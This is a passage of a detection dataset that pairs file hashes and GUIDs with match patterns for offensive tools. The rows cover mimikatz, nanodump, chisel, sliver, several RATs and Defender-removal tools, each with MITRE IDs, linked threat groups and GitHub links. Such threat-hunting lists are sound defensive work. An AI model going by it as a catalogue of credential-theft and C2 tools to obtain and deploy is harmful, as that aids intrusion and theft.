T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31019" "*9036e04e3c1caa4b91d008a010df98e93449cfcd1ace8922d96883bd1587764c*",".{0,1000}9036e04e3c1caa4b91d008a010df98e93449cfcd1ace8922d96883bd1587764c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31021" "*9037b5197eeeb068f24a73f9ac99320e0aeed9a91a69f18eec013c689be871bb*",".{0,1000}9037b5197eeeb068f24a73f9ac99320e0aeed9a91a69f18eec013c689be871bb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31022" "*903d7db4500738baf1e30f3923909fda0df637ca2fd904a6e67565f72925f613*",".{0,1000}903d7db4500738baf1e30f3923909fda0df637ca2fd904a6e67565f72925f613.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - 
T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31023" "*903fa9aeb7419d81f75d5a5a226623c5ec63a52b6da020135b864cd7d92284c9*",".{0,1000}903fa9aeb7419d81f75d5a5a226623c5ec63a52b6da020135b864cd7d92284c9.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#filehash","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","31024" "*9042B543-13D1-42B3-A5B6-5CC9AD55E150*",".{0,1000}9042B543\-13D1\-42B3\-A5B6\-5CC9AD55E150.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","31025" "*90487bd2731d62d51c5bda9ea313fe915fb6ce31fc2c5f54622d780d924da26e*",".{0,1000}90487bd2731d62d51c5bda9ea313fe915fb6ce31fc2c5f54622d780d924da26e.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","31027" "*904A001AD82F09CD0CB1E1945B29F9120BEB603F7D116BD27A18E6A74DB6B53A*",".{0,1000}904A001AD82F09CD0CB1E1945B29F9120BEB603F7D116BD27A18E6A74DB6B53A.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","31028" "*904b042e2ec7aa85331911b1343213292e061dcc4f2010d01f4f7b60f0198b10*",".{0,1000}904b042e2ec7aa85331911b1343213292e061dcc4f2010d01f4f7b60f0198b10.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","#filehash","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","31029" "*906397a1765b82510679cb5b0f26ef1c8c89335c68f1d17178f924e5b2544454*",".{0,1000}906397a1765b82510679cb5b0f26ef1c8c89335c68f1d17178f924e5b2544454.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","31037" 
"*9065655de782c08c41aa0fe11503e92e455fdf4b1a590101221aeb73f8db98e9*",".{0,1000}9065655de782c08c41aa0fe11503e92e455fdf4b1a590101221aeb73f8db98e9.{0,1000}","offensive_tool_keyword","SessionExec","Execute commands in other Sessions","T1053 - T1569","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/SessionExec","1","0","#filehash","N/A","10","1","86","14","2024-07-29T12:24:28Z","2024-07-21T15:32:07Z","31038" "*906a7f9794d035af75552674eaa775b1584a129d1cd16d49c15bb5aa8032661a*",".{0,1000}906a7f9794d035af75552674eaa775b1584a129d1cd16d49c15bb5aa8032661a.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#filehash","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","31039" "*906f3fb4de41cebd2db7a804487066933147df6604e1e9036890dd5b90eb9a9d*",".{0,1000}906f3fb4de41cebd2db7a804487066933147df6604e1e9036890dd5b90eb9a9d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31042" "*9078149dc6ee62aea91749ba2db9aba15c9518f92bfe709b3bba8523f92cd2e8*",".{0,1000}9078149dc6ee62aea91749ba2db9aba15c9518f92bfe709b3bba8523f92cd2e8.{0,1000}","offensive_tool_keyword","Imminent-Monitor","used for malicious activities such as keylogging - screen capture and remote control of infected systems.","T1012 - T1059 - T1105 - T1071 - T1124 - T1041","TA0005 - TA0003 - TA0011 - TA0009","Imminent 
RAT","PROMETHIUM","Malware","https://github.com/Indestructible7/Imminent-Monitor-v3.9","1","0","#filehash","N/A","8","1","4","2","2022-11-04T18:48:14Z","2022-11-04T18:15:20Z","31043" "*9078149dc6ee62aea91749ba2db9aba15c9518f92bfe709b3bba8523f92cd2e8*",".{0,1000}9078149dc6ee62aea91749ba2db9aba15c9518f92bfe709b3bba8523f92cd2e8.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31044" "*908524e7f57ba214a071d8388eb4b1b375d87aade0833e39f1ac12b3660fcb9a*",".{0,1000}908524e7f57ba214a071d8388eb4b1b375d87aade0833e39f1ac12b3660fcb9a.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","31048" "*90873c2ac02c860b3b6ec7cf262ab58504ff187dd9e638bbabef94e985607836*",".{0,1000}90873c2ac02c860b3b6ec7cf262ab58504ff187dd9e638bbabef94e985607836.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#filehash #linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","31049" "*908aaf0590fc3e75a3776ad913ae14c3f328057b8ac0f4135bd1f324a7c1913c*",".{0,1000}908aaf0590fc3e75a3776ad913ae14c3f328057b8ac0f4135bd1f324a7c1913c.{0,1000}","offensive_tool_keyword","Lime-RAT","remote 
administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","31050" "*9092d0cccf0f55b0e680d64f23e6c2cc6e406ab4e05d54aeafe73e9a9943b739*",".{0,1000}9092d0cccf0f55b0e680d64f23e6c2cc6e406ab4e05d54aeafe73e9a9943b739.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","31052" "*9092e23d27fe808acb7485c1cabd30ce0eb89cbdce51da83725668b4305ad2eb*",".{0,1000}9092e23d27fe808acb7485c1cabd30ce0eb89cbdce51da83725668b4305ad2eb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31053" 
"*9093453fbce7f48351fa3e6f57793f3dd20737780eb95d25c0b1643d372180f8*",".{0,1000}9093453fbce7f48351fa3e6f57793f3dd20737780eb95d25c0b1643d372180f8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31054" "*909cb2ae71b22db86c4232041f32352ff94db59760593ada386bde5b4dc8901a*",".{0,1000}909cb2ae71b22db86c4232041f32352ff94db59760593ada386bde5b4dc8901a.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","31055" "*90a2fd2951ffe73118f56f90197f378f17c2e79c38bb58a824f01293187fdca5*",".{0,1000}90a2fd2951ffe73118f56f90197f378f17c2e79c38bb58a824f01293187fdca5.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","31056" "*90A6822C-4336-433D-923F-F54CE66BA98F*",".{0,1000}90A6822C\-4336\-433D\-923F\-F54CE66BA98F.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 
- APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#GUIDproject","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","31057" "*90a9080ebaafb4fcf1deb6e6810b4cfc38e0c16b6c9849969aee3a23a730db5b*",".{0,1000}90a9080ebaafb4fcf1deb6e6810b4cfc38e0c16b6c9849969aee3a23a730db5b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31058" "*90b52aad38a002bb07581fef1caf777ec188fe07dc0f55d828a21ad35ceca48f*",".{0,1000}90b52aad38a002bb07581fef1caf777ec188fe07dc0f55d828a21ad35ceca48f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31059" "*90bb2613b2c711e20dce52480e998feda6e8488017e6f792b486616529cad8b2*",".{0,1000}90bb2613b2c711e20dce52480e998feda6e8488017e6f792b486616529cad8b2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - 
T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31060" "*90bf7beb921839957e7977851f01e757346d2b4f672e6a08b04e57878cd6efbf*",".{0,1000}90bf7beb921839957e7977851f01e757346d2b4f672e6a08b04e57878cd6efbf.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","#filehash","N/A","10","2","150","16","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z","31062" "*90c08dc1a2ec6ad65002990fe43220d8974c92a02c2639562447c98bdbc04a22*",".{0,1000}90c08dc1a2ec6ad65002990fe43220d8974c92a02c2639562447c98bdbc04a22.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31063" "*90c6e84dbeb83eef349d9ac17b1e005c12f42d74cea94a6c0f16a999792ac3f9*",".{0,1000}90c6e84dbeb83eef349d9ac17b1e005c12f42d74cea94a6c0f16a999792ac3f9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue 
Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31064" "*90c6e84dbeb83eef349d9ac17b1e005c12f42d74cea94a6c0f16a999792ac3f9*",".{0,1000}90c6e84dbeb83eef349d9ac17b1e005c12f42d74cea94a6c0f16a999792ac3f9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31065" "*90ca6caa7db1d3998a25b3bbc22526452dd7114bc3b4a660a20f842f8ca50258*",".{0,1000}90ca6caa7db1d3998a25b3bbc22526452dd7114bc3b4a660a20f842f8ca50258.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31066" "*90DEB964-F2FB-4DB8-9BCA-7D5D10D3A0EB*",".{0,1000}90DEB964\-F2FB\-4DB8\-9BCA\-7D5D10D3A0EB.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","31067" "*90dfb88b36bbfab99ffae972aaf0d1959fd7729b11e7b5933486cd2848270fd6*",".{0,1000}90dfb88b36bbfab99ffae972aaf0d1959fd7729b11e7b5933486cd2848270fd6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31068" "*90e0539704cfca45027b3bd74e1cb28cbe8a65367320ce0d58f2ef1b82d50c2a*",".{0,1000}90e0539704cfca45027b3bd74e1cb28cbe8a65367320ce0d58f2ef1b82d50c2a.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. 
Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","31069" "*90e2d1bb612d9658067799266605dff148b292dafd4f6ddff3e184a9b7998376*",".{0,1000}90e2d1bb612d9658067799266605dff148b292dafd4f6ddff3e184a9b7998376.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31074" "*90e767d5fd29fc406847b5ac6151a713643596625209245d3440fd8908ff7427*",".{0,1000}90e767d5fd29fc406847b5ac6151a713643596625209245d3440fd8908ff7427.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","31075" "*90e8f7a8ab2ad07168666a368e3c9e3b1c8c0fc44257d693b76694959e7a1fb5*",".{0,1000}90e8f7a8ab2ad07168666a368e3c9e3b1c8c0fc44257d693b76694959e7a1fb5.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","31076" "*90edb0f25788a09d269aa4f51eb5a7e99d8e95e14ca1f5ab25a958dfcd5fc313*",".{0,1000}90edb0f25788a09d269aa4f51eb5a7e99d8e95e14ca1f5ab25a958dfcd5fc313.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","31077" "*90f04f9b39cd932003faff204822ac0223a01ae2aa867d6e0992d63a8f40788d*",".{0,1000}90f04f9b39cd932003faff204822ac0223a01ae2aa867d6e0992d63a8f40788d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31079" "*90F6244A-5EEE-4A7A-8C75-FA6A52DF34D3*",".{0,1000}90F6244A\-5EEE\-4A7A\-8C75\-FA6A52DF34D3.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - 
TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","#GUIDproject","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","31080" "*90fcf63af14fcaee770bbf4f777845b46fc81a6c38ed966bb80c7b5078d46f17*",".{0,1000}90fcf63af14fcaee770bbf4f777845b46fc81a6c38ed966bb80c7b5078d46f17.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31082" "*910a0899cdb2824c3c5d3a3872196206c17077c24f520d6661b270358b922b6f*",".{0,1000}910a0899cdb2824c3c5d3a3872196206c17077c24f520d6661b270358b922b6f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","31084" "*910c0a93a65b356c7a9534332555c560285117859d771781f9aca7848a25f336*",".{0,1000}910c0a93a65b356c7a9534332555c560285117859d771781f9aca7848a25f336.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","31086" "*9117d2d155a124e050aaf1c64011f5a65198f9dd91289ffcf809f8364740f1d5*",".{0,1000}9117d2d155a124e050aaf1c64011f5a65198f9dd91289ffcf809f8364740f1d5.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is 
